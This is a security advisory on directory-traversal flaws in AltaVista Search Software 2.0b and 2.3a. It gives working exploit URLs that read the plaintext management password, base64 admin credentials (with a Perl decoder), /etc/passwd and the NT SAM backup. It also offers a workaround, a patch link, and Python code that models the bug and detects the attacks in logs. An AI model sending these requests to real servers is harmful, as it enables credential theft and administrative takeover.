With AltaVista Search Software, you can create your own search and retrieval Web site with the same relevancy, performance, and efficiency as the AltaVista Search engine (www.altavista.com) used to index the World Wide Web. This software has been found to contain several security vulnerabilities, all of them directory-traversal issues in the search CGI that expose configuration files, log files and, in the worst case, arbitrary files on the host.
Credit:
The information was provided by: rudi carell.
Vulnerable systems:
AltaVista Search Software 2.0b
AltaVista Search Software 2.3a
The template variable (mss)
The main search CGI (cgi-bin/query) takes the name of a display template in its mss parameter. The value is not confined to the template directory: it allows one traversal step back (../) and will return any file in the http directory of the installation.
Example:
http://www.example.com:9000/cgi-bin/query?mss=../config
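To make the mechanism concrete, here is an added Python model of the bug class. It is not AltaVista's code (which is not available here): a template resolver that validates the raw query value, percent-decodes afterwards and joins without canonicalising, next to a hardened resolver that decodes first and requires the canonical path to stay inside the template directory. The directory layout (/opt/altavista/httpd with templates in httpd/mss) and the template name "simple" are assumptions chosen to mirror the advisory's "one step back"; the model also exercises the percent-encoded multi-step requests shown further down the page.

```python
import posixpath
from urllib.parse import unquote

# Assumed layout mirroring the advisory: templates live in httpd/mss, while
# config and logs sit one level up in httpd/.  Nothing here touches a real
# AltaVista install; it is a model of the bug class only.
HTTPD_DIR = "/opt/altavista/httpd"
TEMPLATE_DIR = posixpath.join(HTTPD_DIR, "mss")


def resolve_template_vulnerable(mss):
    """Model of the flawed handling.  Two mistakes combine:
      1. a single literal '../' is tolerated (the advisory's "one step back"),
      2. the check runs on the RAW query value, so '%2e%2e%2f' and NT-style
         backslashes are not seen, and decoding happens only afterwards.
    Returns the path the server would open."""
    if mss.count("../") > 1:                      # weak check on the raw value
        raise PermissionError("too many traversal steps")
    decoded = unquote(mss)                        # decoded after the check
    decoded = decoded.replace("\\", "/")          # NT accepts either separator
    return posixpath.normpath(posixpath.join(TEMPLATE_DIR, decoded))


def resolve_template_hardened(mss):
    """Decode first, reject characters the filesystem could reinterpret, then
    canonicalise and require the result to lie strictly below TEMPLATE_DIR."""
    decoded = unquote(mss)
    if "\\" in decoded or "\x00" in decoded:
        raise PermissionError("illegal character in template name")
    candidate = posixpath.normpath(posixpath.join(TEMPLATE_DIR, decoded))
    if not candidate.startswith(TEMPLATE_DIR + "/"):
        raise PermissionError("template outside template directory")
    return candidate


def demo():
    """Run the advisory's three requests plus a legitimate template through
    both resolvers; returns {input: (vulnerable result, hardened result)}."""
    probes = [
        "simple",                                            # assumed template name
        "../config",                                         # one step back: plaintext MGMT_PW
        "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd",   # encoded, UNIX
        "%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._", # encoded, Windows NT
    ]
    out = {}
    for p in probes:
        vuln = resolve_template_vulnerable(p)
        try:
            hard = resolve_template_hardened(p)
        except PermissionError as exc:
            hard = "rejected: " + str(exc)
        out[p] = (vuln, hard)
    return out


if __name__ == "__main__":
    for probe, (vuln, hard) in demo().items():
        print(f"{probe}\n  vulnerable -> {vuln}\n  hardened   -> {hard}")
```

The containment test is deliberately done on the canonicalised path rather than by counting ".." sequences: the encoded and backslash variants in the advisory are exactly the inputs that slip past string matching on the raw value.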
The http directory
The http directory contains some very interesting files:
../config          (contains the line MGMT_PW=[plaintext management password])
../logs/mgtstate   (contains passw=[base64-encoded user:password for the management interface]; this is NOT the MGMT_PW value)
../logs/stats.log  (sometimes stats_log)
../logs/access.log (sometimes access_log)
The mgtstate file is the most interesting. It contains the username/password pair for the online config tool (http://sample-site:9000/cgi-bin/mgt) in the form:
passw=[ encoded user:password string ]
The string is base64-encoded, not encrypted. It can be decoded with any base64 decoder such as uudecode, or with the following Perl script:
#!/usr/bin/perl
# Decode the base64 "passw=" value from ../logs/mgtstate into user:password
use strict;
use MIME::Base64;
die "usage: $0 <base64-string>\n" unless @ARGV == 1;
print decode_base64($ARGV[0]), "\n";
With the administrative username and password in hand it is possible to log in to the online config tool (http://sample-site:9000/cgi-bin/mgt), where almost any administrative action is possible.
Temporary workaround:
The idea is that the search CGI caches the files it serves, so a copy of mgtstate containing throwaway credentials can be planted in the cache; attackers who exploit the traversal afterwards receive the cached copy rather than the live file. Full steps would be:
- Edit the <install-dir>/httpd/config file and change MGMT_IPSPEC from "0.0.0.0/0" to a specific IP such as "127.0.0.1/32", so the management interface only accepts connections from that address
- Stop page gathering via the management interface
- Restart the AltaVista search service (to re-read the config file)
- Restart page gathering if necessary
- Change the username/password through the management interface to bogus information
- Exploit the server yourself and download ../logs/mgtstate (this puts the bogus copy in the cache): http://localhost:9000/cgi-bin/query?mss=../logs/mgtstate
- Change the username/password through the management interface to something different (but not used anywhere else)
- Avoid restarting the AltaVista service or clearing the cache, since either would evict the bogus copy
Note that this only hides the mgtstate credentials; ../config (with MGMT_PW) and the other files remain readable, so the MGMT_IPSPEC restriction is what actually limits the damage, and the patch below should be applied.
Patch
A patch is available on AltaVista's Web site at:
http://doc.altavista.com/business_solutions/search_products/free_downloads/search_intranet.shtml
The patch is labeled "AltaVista Search Intranet V2.3A Security Patch 12/99".
Using URI-encoded strings
Percent-encoding the traversal sequence (%2e%2e%2f for ../) bypasses the one-step limit, so files anywhere on the host can be read. Going to the URL:
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
will fetch the /etc/passwd file on UNIX (the number of %2e%2e%2f steps needed depends on how deep the installation directory is).
Fetching the URL:
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._
will fetch sam._, the compressed backup copy of the password database (SAM) kept in the repair directory, on Windows NT servers.
No workaround is currently available for this problem.
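Since no workaround exists, detection matters. As an added example (not part of the advisory), the following Python script hunts for both variants in the server's own access.log: it percent-decodes the mss value repeatedly, treats backslashes as separators as NT does, and flags any request whose template name climbs out of the template directory. The log lines are constructed for this example in Common Log Format; that AltaVista's access.log uses exactly this format is an assumption, and the regular expression is the only part that would need adjusting.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access.log excerpt in Common Log Format (made up for this
# example; the real file's format may differ).  Lines 2-5 replay the
# advisory's requests; the last one is a probe of the management CGI.
SAMPLE_ACCESS_LOG = r"""
10.0.0.5 - - [14/Dec/1999:10:01:02 -0500] "GET /cgi-bin/query?q=altavista&mss=simple HTTP/1.0" 200 2314
10.0.0.9 - - [14/Dec/1999:10:02:17 -0500] "GET /cgi-bin/query?mss=../config HTTP/1.0" 200 1187
10.0.0.9 - - [14/Dec/1999:10:02:31 -0500] "GET /cgi-bin/query?mss=../logs/mgtstate HTTP/1.0" 200 96
10.0.0.9 - - [14/Dec/1999:10:03:05 -0500] "GET /cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd HTTP/1.0" 200 1402
10.0.0.9 - - [14/Dec/1999:10:03:40 -0500] "GET /cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._ HTTP/1.0" 404 311
10.0.0.7 - - [14/Dec/1999:10:05:00 -0500] "GET /cgi-bin/mgt HTTP/1.0" 401 0
"""

# Common Log Format: host ident user [time] "method target protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing, so double-encoded
    sequences such as %252e are unwrapped too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_depth(template):
    """Maximum number of levels the name climbs above its starting directory.
    Backslashes count as separators because NT accepts both."""
    depth = deepest = 0
    for part in template.replace("\\", "/").split("/"):
        if part == "..":
            depth += 1
            deepest = max(deepest, depth)
        elif part not in ("", "."):
            depth -= 1
    return deepest


def find_traversal_requests(log_text, min_depth=1):
    """Return one record per query?mss= request whose decoded template name
    climbs at least min_depth levels out of the template directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/cgi-bin/query"):
            continue
        # Split the query string by hand so the raw mss value is decoded
        # exactly once per round by decode_fully, not implicitly by parse_qs.
        for pair in parts.query.split("&"):
            key, _, raw = pair.partition("=")
            if key != "mss":
                continue
            mss = decode_fully(raw)
            depth = traversal_depth(mss)
            if depth >= min_depth:
                hits.append({"ip": m.group("ip"), "time": m.group("time"),
                             "status": int(m.group("status")),
                             "mss": mss, "depth": depth})
    return hits


if __name__ == "__main__":
    for h in find_traversal_requests(SAMPLE_ACCESS_LOG):
        served = "served" if h["status"] == 200 else "not served"
        print(f"{h['time']} {h['ip']} depth={h['depth']} {served}: {h['mss']}")
```

The status code is kept in each record because a 200 on a traversal request means the file was actually handed out, which is the difference between an attempted and a successful disclosure when scoping an incident. Note also that the workaround above serves a cached mgtstate, so a 200 on that path after the cache has been poisoned is expected rather than alarming.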